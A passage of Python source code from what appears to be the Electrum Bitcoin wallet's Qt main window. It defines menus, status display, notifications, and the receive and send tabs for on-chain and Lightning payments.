wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter="",
*, default_extension: str = None,
default_filter: str = None) -> Optional[str]:
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(self, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
self.config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.lnworker:
l = self.wallet.lnworker.get_balance()
text += u' \U0001f5f2 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('Request'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('On-chain'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
self.address_list.update()
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r.id + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay"), self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({repr(err.exc)})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, amount_sat: int):
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_sat, attempts=attempts)
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, key, status):
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, key):
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, key, description=None):
self.show_message(_('Payment succeeded'))
self.need_update.set()
def on_payment_failed(self, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.lnworker:
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.amount is None:
amount = self.amount_e.get_amount()
if amount:
invoice.amount = amount
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_clear()
